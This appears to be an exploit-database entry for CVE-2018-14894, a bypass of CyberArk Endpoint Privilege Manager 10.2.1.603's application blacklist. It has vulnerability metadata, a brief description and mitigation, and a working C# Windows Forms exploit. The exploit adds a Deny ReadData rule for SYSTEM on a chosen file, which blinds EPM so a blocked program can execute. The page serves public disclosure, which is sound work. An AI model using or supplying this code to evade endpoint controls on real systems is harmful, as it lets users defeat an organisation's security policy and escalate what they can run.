CyberArk Endpoint bypass

vendor:

Endpoint Privilege Manager

by:

Alpcan Onaran, Mustafa Kemal Can

7.8

CVSS

HIGH

Privilege Escalation

287

CWE

Product Name: Endpoint Privilege Manager

Affected Version From: 10.2.1.603

Affected Version To: 10.2.1.603

Patch Exists: YES

Related CWE: CVE-2018-14894

CPE: a:cyberark:endpoint_privilege_manager

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10

2018

This exploit works on CyberArk EPM 10.2.1.603 and below. It is possible to bypass the CyberArk Endpoint Privilege Manager (EPM) by revoking read privileges for the system on the file that the user wants to open. This will cause the EPM to be unable to get information about the blocked file and it will let the user execute it.

Mitigation:

Ensure that the CyberArk EPM is updated to the latest version and that all users are aware of the potential security risks of granting privileges to applications.

Source

Exploit-DB raw data:

# Exploit Title: CyberArk Endpoint bypass 
# Google Dork: -
# Date: 03/06/2018
# Exploit Author: Alpcan Onaran, Mustafa Kemal Can
# Vendor Homepage: https://www.cyberark.com
# Software Link: -
# Version: 10.2.1.603
# Tested on: Windows 10
# CVE : CVE-2018-14894

//If user needs admin privileges, CyberArk gives the admin token to user for spesific process not for the whole system. It is cool idea.
//This product also has a function called “Application Blacklist”. You probably know what that means.
//It helps you to block to execute specified application by CyberArk admin. In normal cases, you can not be able to start this process even with admin rights.
//But We found very interesting trick to make CyberArk blind completely.All you need to do, revoke read privileges for system on the file that you want to open it.
//After you do that, CyberArk EPM can not be able to get information about your blocked file and it just let them execute

This exploit works on CyberArk EPM 10.2.1.603 and below. (Tested on Windows 10 x64)
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System;
using System.IO;
using System.Security.AccessControl;

namespace raceagainstthesystem
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }

        private void btn_change_access_control_Click(object sender, EventArgs e)
        {
            string fileName = txt_filepath.Text;
            FileSecurity fSecurity = File.GetAccessControl(fileName);
            fSecurity.AddAccessRule(new FileSystemAccessRule(@"SYSTEM",
                    FileSystemRights.ReadData, AccessControlType.Deny));
            File.SetAccessControl(fileName, fSecurity);

            /*
            fSecurity.RemoveAccessRule(new FileSystemAccessRule(@"SYSTEM",
                    FileSystemRights.ReadData, AccessControlType.Allow));
            */

            File.SetAccessControl(fileName, fSecurity);
        }

        private void btn_choseFile_Click(object sender, System.EventArgs e)
        {
            OpenFileDialog choofdlog = new OpenFileDialog();
            choofdlog.Filter = "All Files (*.*)|*.*";
            choofdlog.FilterIndex = 1;
            choofdlog.Multiselect = true;

            string sFileName = "";

            if (choofdlog.ShowDialog() == DialogResult.OK)
            {
                sFileName = choofdlog.FileName;
                string[] arrAllFiles = choofdlog.FileNames; //used when Multiselect = true           
            }
            txt_filepath.Text = sFileName;
        }
    }
}